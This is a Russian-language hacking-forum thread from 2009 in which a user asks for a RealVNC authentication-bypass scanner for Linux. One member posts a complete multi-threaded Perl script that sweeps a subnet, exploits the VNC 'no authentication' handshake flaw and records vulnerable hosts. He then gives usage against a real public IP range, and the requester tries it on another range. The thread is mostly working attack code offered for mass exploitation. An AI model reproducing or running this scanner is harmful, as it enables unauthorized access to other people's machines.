HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Безопасность и Анонимность > Soft - *nix
   
 
 
Опции темы Поиск в этой теме Опции просмотра

RealVNC Bypass Authentication Scanner
  #1  
Старый 11.06.2009, 13:20
m1lo
Banned
Регистрация: 30.05.2009
Сообщений: 167
С нами: 8920770

Репутация: 33
По умолчанию RealVNC Bypass Authentication Scanner

помогите!! необходима прога RealVNC Bypass Authentication Scanner для линукса! а конкретно gentoo

поставил чтото - но оказалось что это просто vnc viewоблазил весь инет но так и ненашел где скачать RealVNC Bypass Authentication Scanner для генты!! заранее спс!!
 

  #2  
Старый 11.06.2009, 13:29
Pernat1y
Постоянный
Регистрация: 20.12.2007
Сообщений: 577
С нами: 9679729

Репутация: 171


По умолчанию

в MSF вроде был. попробуй
 

  #3  
Старый 11.06.2009, 13:42
fl00der
Постоянный
Регистрация: 17.12.2008
Сообщений: 353
С нами: 9157119

Репутация: 74
По умолчанию

Тыц-тыц-клац
А черт, тебе же для генты, а это виндовый! Тогда не знаю. Ну пусть все равно будет.

Последний раз редактировалось fl00der; 11.06.2009 в 13:44..
 

  #4  
Старый 11.06.2009, 20:55
m1lo
Banned
Регистрация: 30.05.2009
Сообщений: 167
С нами: 8920770

Репутация: 33
По умолчанию

Тыц-тыц-клац

дык мне не под винду надо!!! LINUX
 

  #5  
Старый 11.06.2009, 21:24
Xcontrol212
Постоянный
Регистрация: 13.02.2008
Сообщений: 505
С нами: 9600218

Репутация: 277


По умолчанию

внц сканер вроде и под винду и под линукс....
 

  #6  
Старый 11.06.2009, 21:58
shellz[21h]
Постоянный
Регистрация: 20.12.2007
Сообщений: 334
С нами: 9680718

Репутация: 118
По умолчанию

PHP код:
#!/usr/bin/perl
# Multi-threaded scan for OpenVNC 4.11 authentication bypass.
# Based on Tyler Krpata's Perl scanning code.

use strict;
use 
warnings;
use 
IO::Socket;
use 
threads;
use 
threads::shared;
use 
Errno qw(EAGAIN);

# Configuration variables
use constant VNC_PORT => 5900;
my $splits 5# Creates 2^N processes.
my $avg_time 5# Tweak this to get better time estimates.
our $subnet;

our @results shared;
our $todo 0;
my $orig_thread "yes";
my $start;
my $end;
my $time_estimate;
my $elapsed time;
my $out_file;

++$|; 
# To watch as the results come in, in real time.
$subnet $ARGV[0] || ""# Get subnet from command line, else ask for it.

while (1) {
    
last if $subnet =~ m/^\d{1,3}\.\d{1,3}\.\d{1,3}\.?\*?/;
    print 
"\nWhat subnet do you want to scan? ";
    
chomp($subnet = <STDIN>);
    print 
"That does not look right. Enter something like 192.168.1.*\n\n";
}

# Put the subnet in the form x.y.z. so we can just concatenate the hostnum.
$subnet =~ s/^(\d{1,3}\.\d{1,3}\.\d{1,3}).*/$1/;
$subnet .= ".";

$out_file "VNC_" $subnet "txt";

# Mostly a guesstimate
$time_estimate $avg_time * (256 / (2**$splits));
$time_estimate int ($time_estimate 60);
$time_estimate += 4;

print 
"\nScanning subnet ${subnet}x -- this should take approximately
$time_estimate minute(s).\n";
print 
"[!] = Vulnerable,[*] = Safe, [.] = No response.\n\n";

CHECK: {
    
unless ($splits >= && $splits <= 8) {
        die 
"ERROR: Do not split $splits times--that makes no sense.\n";
    }

    
unless ($splits <= 5) {
        
warn "Reduce the number of splits from $splits to 5 or less if you
        get memory errors.\n\n"
;
    }
}

# Ugly, but this works.
DivideWork() if $splits >= 1;
DivideWork() if $splits >= 2;
DivideWork() if $splits >= 3;
DivideWork() if $splits >= 4;
DivideWork() if $splits >= 5;
DivideWork() if $splits >= 6;
DivideWork() if $splits >= 7;
DivideWork() if $splits >= 8;

# Which IPs this thread scans.
$start $todo << ($splits);
$end $start + (256 / (2**$splits)) - 1;

foreach (
$start .. $end) {
    
Scan_VNC($_);
}

wait until $?; # Wait for children to finish.
exit unless $orig_thread eq "yes";

# Only the original parent thread will continue.

$elapsed time $elapsed;
$elapsed /= 60;
$elapsed int $elapsed;

print 
"\n\nFinished scanning ${subnet}x in $elapsed minute(s).\n";

SaveData();

exit;

####################################

sub DivideWork {
    
my $pid;

    
FORK: {
        
$todo *= 2;
        if (
$pid fork) {
            
# Parent
            
++$todo;

        } 
elsif (defined $pid) {
            
# Child
            
$orig_thread "no";

        } 
elsif ($! == EAGAIN) {
            
# Recoverable forking error.
            
sleep 7;
            
redo FORK;

        } else {
            
# Unable to fork.
            
die "Unable to fork: $!\n";

        }
    }
}


sub SaveData {
    
my $vulns 0;
    
open(FOUND">"$out_file) or die "Cannot open $out_file -- $!";

    foreach 
my $IP (1..254) {
        
my $record;
        
$record $results[$IP];

        
unless ($record =~ m/not vulnerable/io) {
            ++
$vulns;
            print 
FOUND $record;
        }
    }

    print 
FOUND "\nVulnerabilites found: $vulns";
    
close(FOUND) or die "Cannot close $out_file -- $!";

    print 
"Data saved to ${out_file}\n\n";
}

sub Scan_VNC {
    
# Scan for OpenVNC 4.11 authentication bypass.

    
my $hostnum shift;
    
my $host $subnet $hostnum;
    
my $sock;
    
my $proto_ver;
    
my $ignored;
    
my $auth_type;
    
my $sec_types;
    
my $vnc_data;

    
$host or die("ERROR: no host passed to Scan_VNC.\n");

    
# The host numbers .0 and .255 are reserved; ignore them.
    
if ($hostnum <= or $hostnum >= 255) { return; }

    
# Format things nicely--that crazy formula just adds spaces.
    
$results[$hostnum] = "$host";
    
$results[$hostnum] .= (" " (int(log($hostnum)/log(10)))) . " = ";

    
unless ($sock IO::Socket::INET->new(PeerAddr => $hostPeerPort => VNC_PORTProto => 'tcp',)) {
        
$results[$hostnum] .= "Not vulnerable, no response.\n";
        print 
".";
        return;
    }

    
# Negotiate protocol version.
    
$sock->read($proto_ver12);
    print 
$sock $proto_ver;

    
# Get supported security types and ignore them.
    
$sock->read($sec_types1);
    
$sock->read($ignoredunpack('C'$sec_types));

    
# Claim that we only support no authentication.
    
print $sock "\x01";

    
# We should get "0000" back, indicating that they won't fall back to no authentication.
    
$sock->read($auth_type4);
    if (
unpack('I'$auth_type)) {
        
$results[$hostnum] .= "Not vulnerable, refused to support
        authentication type.\n"
;
        print 
"*";
        
close($sock);
        return;
    }

    
# Client initialize.
    
print $sock "\x01";

    
# If the server starts sending data, we're in.
    
$sock->read($vnc_data4);

    if (
unpack('I'$vnc_data)) {
        
$results[$hostnum] .= "VULNERABLE! $proto_ver\n";
        print 
"!";
    } else {
        
$results[$hostnum] .= "Not vulnerable, did not send data.\n";
        print 
"*";
    }

    
close($sock);
    return;

 

  #7  
Старый 11.06.2009, 22:07
m1lo
Banned
Регистрация: 30.05.2009
Сообщений: 167
С нами: 8920770

Репутация: 33
По умолчанию

shellz[21h] пасиб конечно, но мона пояснить как юзать скрипт
 

  #8  
Старый 11.06.2009, 22:23
shellz[21h]
Постоянный
Регистрация: 20.12.2007
Сообщений: 334
С нами: 9680718

Репутация: 118
По умолчанию

замени 31 строчку кода на
Код:
 last if $subnet =~ m/^\d{1,3}\.\d{1,3}\.\d{1,3}\.?\*?/;
там косяк в регулярке.
запускается вот так:
]$ perl vnc.pl 85.18.3 - будет сканить 85.18.3.*
 

  #9  
Старый 11.06.2009, 22:29
m1lo
Banned
Регистрация: 30.05.2009
Сообщений: 167
С нами: 8920770

Репутация: 33
По умолчанию

ок спс
буду пробывать
 

  #10  
Старый 11.06.2009, 22:38
m1lo
Banned
Регистрация: 30.05.2009
Сообщений: 167
С нами: 8920770

Репутация: 33
По умолчанию

так я в перле не шарю вообще

Цитата:
zaG-laptop code # perl realvnc.pl 77.232.1
realvnc.pl line 8:

This Perl hasn't been configured and built properly for the threads
module to work. (The 'useithreads' configuration option hasn't been used.)

Having threads support requires all of Perl and all of the XS modules in
the Perl installation to be rebuilt, it is not just a question of adding
the threads module. (In other words, threaded and non-threaded Perls
are binary incompatible.)

If you want to the use the threads module, please contact the people
who built your Perl.

Cannot continue, aborting.
BEGIN failed--compilation aborted at /usr/lib/perl5/5.8.8/i686-linux/threads.pm line 28.
Compilation failed in require at realvnc.pl line 8.
BEGIN failed--compilation aborted at realvnc.pl line 8.
zaG-laptop code #
 
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Lumension Security Vulnerability Scanner spider-intruder Защита ОС: вирусы, антивирусы, файрволы. 3 08.04.2009 17:07
VNC bypass scanner ( проще говоря " добываем дедики" ) gemaglabin Уязвимости 19 20.10.2007 16:36
Acunetix Web Vulnerability Scanner 3 Crack sn0w Уязвимости 90 13.08.2007 15:34
Новости byte57 Мировые новости. Обсуждения. 98 08.06.2005 11:29



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.